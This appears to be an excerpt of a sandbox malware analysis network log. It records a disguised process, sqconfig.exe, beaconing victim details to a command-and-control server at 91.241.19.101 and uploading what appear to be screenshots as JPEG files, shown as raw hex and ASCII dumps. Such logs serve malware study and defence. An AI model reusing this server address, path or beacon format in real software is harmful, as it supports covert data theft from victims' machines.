                                                                  Sep 30, 2021 23:52:54.634648085 CEST7606OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:52:54.752201080 CEST7614OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:52:54.752264023 CEST7619OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:52:54.752500057 CEST7626OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:52:54.752523899 CEST7629OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:52:54.752602100 CEST7631OUTData Raw: df 3e 5c b8 f6 35 a1 8a 70 e3 bd 3f 69 35 b3 0f 67 07 ba 30 a5 f0 cc c3 94 60 d5 4e 4d 0e f2 31 fe a8 91 ed 5d 62 96 07 ad 4a 25 71 de ad 62 aa 2f 30 fa bc 1e cc e1 1e ca 78 fe f4 6c 3f 0a 8c a3 2f 63 5e 82 5d 58 7c f1 a9 fc 2a 36 b4 b2 9f ef c0
                                                                  Data Ascii: >\5p?i5g0`NM1]bJ%qb/0xl?/c^]X|*6ZktK7Y2z$l%Jifv#nS09*U**l:(VfgyQf*n=;WJZ+voWU%2#_;TPFye-'i"m RSWL'f
                                                                  Sep 30, 2021 23:52:54.869882107 CEST7637OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:52:54.869990110 CEST7648OUTData Raw: ef fb 90 fd 57 e6 79 ab 7c 06 d3 36 9d ba 80 2d 8e 01 85 c0 ff 00 d1 95 e5 1e 34 f0 4d ff 00 84 b5 16 8e 54 26 03 ca ba e4 8c 7a 83 dc 7f 93 5f 57 59 5d 25 f5 85 bd dc 60 84 9e 25 95 41 ea 03 00 7f ad 67 78 97 c3 f6 be 23 d2 25 b3 b8 45 2f 82 62
                                                                  Data Ascii: Wy|6-4MT&z_WY]%`%Agx#%E/br>c2=6nx*Kb$S[Gg\CjA ~H!QN*K*5eJ[h:g4U>6Z]3NVts0h,;qqY}h}i
                                                                  Sep 30, 2021 23:52:55.147332907 CEST7687INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:55 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  170192.168.2.35000591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:49.608844042 CEST18542OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:49.807394028 CEST18581INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:49 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  171192.168.2.35000691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:49.622118950 CEST18542OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:49.622340918 CEST18542OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:49.622581005 CEST18552OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:49.622694969 CEST18555OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:49.744920969 CEST18558OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:49.745007038 CEST18561OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:49.745338917 CEST18575OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:53:49.745367050 CEST18578OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:49.745377064 CEST18581OUTData Raw: df 3e 5c b8 f6 35 a1 8a 70 e3 bd 3f 69 35 b3 0f 67 07 ba 30 a5 f0 cc c3 94 60 d5 4e 4d 0e f2 31 fe a8 91 ed 5d 62 96 07 ad 4a 25 71 de ad 62 aa 2f 30 fa bc 1e cc e1 1e ca 78 fe f4 6c 3f 0a 8c a3 2f 63 5e 82 5d 58 7c f1 a9 fc 2a 36 b4 b2 9f ef c0
                                                                  Data Ascii: >\5p?i5g0`NM1]bJ%qb/0xl?/c^]X|*6ZktK7Y2z$l%Jifv#nS09*U**l:(VfgyQf*n=;WJZ+voWU%2#_;TPFye-'i"m RSWL'f
                                                                  Sep 30, 2021 23:53:49.867743015 CEST18592OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:49.867836952 CEST18599OUTData Raw: 2a 9b 69 04 09 3c 20 05 67 42 37 64 ee 63 b4 e4 b1 f5 aa da 46 a5 a4 69 5e 19 d2 f5 66 3a 94 29 67 ae cf 3d a5 b4 7b 25 69 48 86 12 12 49 72 9b 54 f0 09 08 78 27 8a 9f 6c ed 7f eb 57 61 fb 25 7f eb a2 b9 ca ae 8b aa b6 96 75 55 d2 ef 8e 9c 01 26
                                                                  Data Ascii: *i< gB7dcFi^f:)g={%iHIrTx'lWa%uU&[^I'gnSf%aH[V3_n].D%e%p7)Qb:~v'hbe96F<|goN)y+_ok_Gcy4C.Qbb/<#5.
                                                                  Sep 30, 2021 23:53:50.046799898 CEST18630INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:49 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  172192.168.2.35000791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:50.040025949 CEST18630OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:50.234852076 CEST18630INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:50 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:53:50.321171999 CEST18630OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:50.321513891 CEST18631OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:50.322199106 CEST18641OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:50.322582960 CEST18643OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:50.446722984 CEST18646OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:50.446903944 CEST18654OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:50.446995020 CEST18657OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:53:50.447108984 CEST18665OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:50.447165012 CEST18670OUTData Raw: c7 87 18 ff 00 d3 33 5e 2f 7e df be 73 fe d1 af 3b 28 5e f4 cf 7b 39 77 f6 7e 87 a1 59 71 f0 ee 0f a8 fe 75 cc c9 5d 25 a1 c7 c3 bb 6f 73 fd 6b 97 95 c8 27 da b4 c2 2f 7a 7e ac e4 cc dd 94 3d 11 13 92 0f 06 90 4b 20 e8 e4 7e 34 84 e6 9b 5e 8d 91
                                                                  Data Ascii: 3^/~s;(^{9w~Yqu]%osk'/z~=K ~4^;NrgOXoE.Hu,i'AMkI>bq+[2wqVE~5lCT<GsMu5XO-&<Jii-iD'kg/TF5W+9+zO7:&r#
                                                                  Sep 30, 2021 23:53:50.573170900 CEST18674OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:53:50.573342085 CEST18682OUTData Raw: 21 cc 8b f5 ae 1c 27 f0 5f ab 3e 8e af c6 bd 11 ec fa a7 1a 16 93 ff 00 5c 47 f2 ac 5e f5 b7 ab 71 a3 69 43 fe 98 8f e4 2b 0e b9 70 bf c3 fb ca c7 ff 00 1b ee 17 14 b8 34 99 a5 cd 74 9c 61 4f 14 ca 50 6a 46 89 29 69 a0 d2 f7 a4 5a 14 53 85 37 34
                                                                  Data Ascii: !'_>\G^qiC+p4taOPjF)iZS74H;((R!iT!HRLu0Z&* qR)C5C\T8u)yz5_7uCj-JP;Y0M&MsQQ(7xxt+2JQQo
                                                                  Sep 30, 2021 23:53:50.746943951 CEST18718INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:50 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  173192.168.2.35000891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:50.486439943 CEST18671OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:50.663682938 CEST18717INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:50 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  174192.168.2.35000991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:50.922894001 CEST18719OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:51.125895977 CEST18733INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:51 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  175192.168.2.35001091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:51.103466034 CEST18720OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:51.103662014 CEST18720OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:51.104002953 CEST18730OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:51.104304075 CEST18733OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:51.220505953 CEST18739OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
